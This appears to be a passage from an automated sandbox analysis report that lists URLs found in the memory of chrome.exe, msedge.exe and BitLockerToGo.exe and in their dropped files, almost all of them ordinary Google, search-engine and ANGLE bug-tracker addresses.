Source: chrome.exe, 00000007.00000003.1958809149.000051E00340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1955790982.000051E003284000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1955678215.000051E003100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1957770405.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1957620644.000051E002E60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1958733292.000051E003378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1955843035.000051E0032D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1955971659.000051E003134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1957650348.000051E002978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2021987426.000051E0024F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1957826272.000051E00317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1956045625.000051E0032A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1958345065.000051E0025B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000007.00000003.1958809149.000051E00340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1955790982.000051E003284000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1955678215.000051E003100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1957770405.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1957620644.000051E002E60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1958733292.000051E003378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1955843035.000051E0032D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1955971659.000051E003134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1957650348.000051E002978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2021987426.000051E0024F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1957826272.000051E00317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1956045625.000051E0032A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1958345065.000051E0025B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000007.00000003.1958809149.000051E00340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1955790982.000051E003284000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1955678215.000051E003100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1957770405.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1957620644.000051E002E60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1958733292.000051E003378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1955843035.000051E0032D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1955971659.000051E003134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1957650348.000051E002978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2021987426.000051E0024F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1957826272.000051E00317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1956045625.000051E0032A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1958345065.000051E0025B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000007.00000003.1958809149.000051E00340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1955790982.000051E003284000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1955678215.000051E003100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1957770405.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1957620644.000051E002E60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1958733292.000051E003378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1955843035.000051E0032D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1955971659.000051E003134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1957650348.000051E002978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2021987426.000051E0024F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1957826272.000051E00317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1956045625.000051E0032A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1958345065.000051E0025B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 00000007.00000002.2020080458.000051E0022FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025755406.000051E002B60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2028267626.000051E00308C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: chrome.exe, 00000007.00000002.2025904875.000051E002BBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: chrome.exe, 00000007.00000002.2025755406.000051E002B60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 00000007.00000002.2020080458.000051E0022FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/update2/response
Source: chrome.exe, 00000007.00000002.2025977188.000051E002BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204
Source: BitLockerToGo.exe, 00000003.00000002.2315855967.00000000051AC000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024934993.000051E0029A4000.00000004.00000800.00020000.00000000.sdmp, gl68gd.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000007.00000002.2019357752.000051E002278000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000007.00000002.2019357752.000051E002278000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGetQ
Source: chrome.exe, 00000007.00000002.2022699641.000051E00260C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2022876706.000051E002698000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2026845676.000051E002DB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2019213351.000051E00221C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000007.00000002.2020934104.000051E0023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000007.00000002.2020934104.000051E0023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000007.00000002.2020934104.000051E0023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000007.00000002.2020934104.000051E0023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000007.00000003.1959579225.000051E0024A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 00000007.00000003.1959579225.000051E0024A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 00000007.00000003.1959579225.000051E0024A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000007.00000002.2019982777.000051E0022B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000007.00000002.2019982777.000051E0022B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000007.00000002.2019982777.000051E0022B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000007.00000002.2019357752.000051E002278000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000007.00000002.2019357752.000051E002278000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxABQ
Source: chromecache_437.9.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_437.9.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com:443
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: chrome.exe, 00000007.00000003.1943221135.000051E002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830j
Source: chrome.exe, 00000007.00000003.1943221135.000051E002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000007.00000003.1943221135.000051E002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000007.00000003.1943221135.000051E002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000007.00000003.1943221135.000051E002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000007.00000003.1943221135.000051E002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024026471.000051E0028A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000007.00000002.2024026471.000051E0028A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246up.
Source: chrome.exe, 00000007.00000003.1943221135.000051E002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000007.00000003.1943221135.000051E002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/73193
Source: chrome.exe, 00000007.00000003.1943221135.000051E002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000007.00000003.1943221135.000051E002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369(
Source: chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369g
Source: chrome.exe, 00000007.00000003.1943221135.000051E002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000007.00000003.1943221135.000051E002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000007.00000003.1943221135.000051E002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000007.00000003.1943221135.000051E002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000007.00000003.1943221135.000051E002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899z
Source: chrome.exe, 00000007.00000003.1971772953.000051E003CD0000.00000004.00000800.00020000.00000000.sdmp, chromecache_437.9.dr, chromecache_434.9.dr	String found in binary or memory: https://apis.google.com
Source: chrome.exe, 00000007.00000002.2024340091.000051E0028EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2028394858.000051E0030D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2030630799.000051E003B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes
Source: msedge.exe, 0000000B.00000002.2153311815.000001D3EE35D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: BitLockerToGo.exe, 00000003.00000002.2315855967.000000000516F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2318678012.000000000576D000.00000004.00000020.00020000.00000000.sdmp, qiekno.3.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: BitLockerToGo.exe, 00000003.00000002.2315855967.000000000516F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2318678012.000000000576D000.00000004.00000020.00020000.00000000.sdmp, qiekno.3.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: chrome.exe, 00000007.00000002.2023188496.000051E002700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2028984895.000051E003248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024514018.000051E002920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000007.00000002.2026913697.000051E002DE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: BitLockerToGo.exe, 00000003.00000002.2315855967.00000000051AC000.00000004.00000020.00020000.00000000.sdmp, gl68gd.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chrome.exe, 00000007.00000002.2026945596.000051E002DF4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000007.00000002.2026945596.000051E002DF4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: BitLockerToGo.exe, 00000003.00000002.2315855967.00000000051AC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2317036639.00000000054B8000.00000004.00000020.00020000.00000000.sdmp, gl68gd.3.dr, 9rieus.3.dr, Web Data.12.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 00000007.00000002.2026771530.000051E002D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000007.00000002.2026771530.000051E002D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000007.00000002.2026771530.000051E002D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: BitLockerToGo.exe, 00000003.00000002.2315855967.00000000051AC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2317036639.00000000054B8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025904875.000051E002BBC000.00000004.00000800.00020000.00000000.sdmp, gl68gd.3.dr, 9rieus.3.dr, Web Data.12.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000007.00000003.1947177679.000051E002FE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.2178219354.000073480016C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000007.00000002.2023785899.000051E00281C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000007.00000002.2025755406.000051E002B60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025527929.000051E002ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029384362.000051E003370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025977188.000051E002BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000007.00000002.2029384362.000051E003370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enA
Source: chrome.exe, 00000007.00000002.2029384362.000051E003370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enQ
Source: chrome.exe, 00000007.00000003.1962213926.000051E002E78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1942620998.000051E002E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1942565343.000051E002E60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943409257.000051E002E60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1958140569.000051E002FE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1957310340.000051E002E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943353090.000051E002FE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1947177679.000051E002FE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000007.00000002.2018104440.00002AA000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976197405.00002AA000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1935537468.00002AA00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1935686644.00002AA000728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000007.00000002.2018104440.00002AA000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976197405.00002AA000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1935537468.00002AA00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1935686644.00002AA000728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000007.00000002.2018104440.00002AA000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000007.00000002.2018104440.00002AA000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000007.00000003.1970677620.000051E00384C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974231588.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976197405.00002AA000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1969627864.000051E003850000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1935537468.00002AA00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1935686644.00002AA000728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000007.00000002.2021058814.000051E00240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000007.00000002.2020559563.000051E00237C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.2178219354.000073480016C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.dr	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000007.00000002.2028111286.000051E00304C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000007.00000002.2020934104.000051E0023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000007.00000002.2020934104.000051E0023C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/g
Source: chrome.exe, 00000007.00000003.1931660163.0000369C002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1931677319.0000369C002E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
